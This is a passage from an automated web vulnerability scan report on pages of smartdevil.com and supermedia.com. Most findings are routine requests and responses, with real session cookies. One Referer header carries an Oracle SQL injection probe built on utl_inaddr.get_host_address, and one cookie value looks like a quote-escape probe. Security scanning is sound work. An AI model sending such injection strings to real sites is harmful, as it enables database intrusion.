Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21218
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:36 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.18. https://www.smartdevil.com/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /Home.aspx

Request

GET /Home.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:39 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.19. https://www.smartdevil.com/SSLLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin.aspx

Request

GET /SSLLogin.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:47:34 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:34 GMT
Content-Length: 24206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.20. https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin/tabid/116/Default.aspx

Request

GET /SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: http://www.smartdevil.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:44:23 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:26 GMT
Content-Length: 24270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.21. https://www.smartdevil.com/SSLLogin/tabid/116/ctl/SendPassword/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /SSLLogin/tabid/116/ctl/SendPassword/Default.aspx

Request

GET /SSLLogin/tabid/116/ctl/SendPassword/Default.aspx?returnurl=%2fSSLLogin.aspx HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:47:46 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:45 GMT
Content-Length: 19545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.22. https://www.smartdevil.com/ScriptResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /ScriptResource.axd

Request

GET /ScriptResource.axd HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1978
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<meta
...[SNIP]...

27.23. https://www.smartdevil.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /WebResource.axd

Request

GET /WebResource.axd HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1978
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<meta
...[SNIP]...

27.24. https://www.smartdevil.com/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /privacy.aspx

Request

GET /privacy.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.25. https://www.smartdevil.com/terms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /terms.aspx

Request

GET /terms.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49241
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

27.26. https://www.supermedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761715|check#true#1296759915; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:04:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 31158


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...

27.27. https://www.supermedia.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us

Request

GET /about-us HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/packaged-solutions
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762062|check#true#1296760262; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:09:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25172


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>About SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...

27.28. https://www.supermedia.com/about-us/corporate-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/corporate-profile

Request

GET /about-us/corporate-profile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Corporate Profile | SuperMedia.com Advertising</title>



...[SNIP]...

27.29. https://www.supermedia.com/about-us/executive-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/executive-team

Request

GET /about-us/executive-team HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Executive Team | SuperMedia.com Advertising</title>



...[SNIP]...

27.30. https://www.supermedia.com/about-us/our-clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us/our-clients

Request

GET /about-us/our-clients HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:14 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Clients | SuperMedia.com Advertising</title>



...[SNIP]...

27.31. https://www.supermedia.com/advertising-goals  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /advertising-goals

Request

GET /advertising-goals HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Goals | SuperMedia.com Advertising</title>



...[SNIP]...

27.32. https://www.supermedia.com/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings

Request

GET /business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:28:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...

27.33. https://www.supermedia.com/business-listings/coupons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings/coupons

Request

GET /business-listings/coupons HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Coupons | SuperMedia.com Advertising</title>



...[SNIP]...

27.34. https://www.supermedia.com/business-listings/listing-enhancements-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /business-listings/listing-enhancements-packages

Request

GET /business-listings/listing-enhancements-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Listing Click Packages | SuperMedia.com Advertising</title>



...[SNIP]...

27.35. https://www.supermedia.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers

Request

GET /careers HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:55 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Careers</title>


<link type="text/css" rel="stylesh
...[SNIP]...

27.36. https://www.supermedia.com/careers/compensation-benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/compensation-benefits

Request

GET /careers/compensation-benefits HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Compensation and Benefits | SuperMedia.com Advertising</title>



...[SNIP]...

27.37. https://www.supermedia.com/careers/core-values  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/core-values

Request

GET /careers/core-values HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
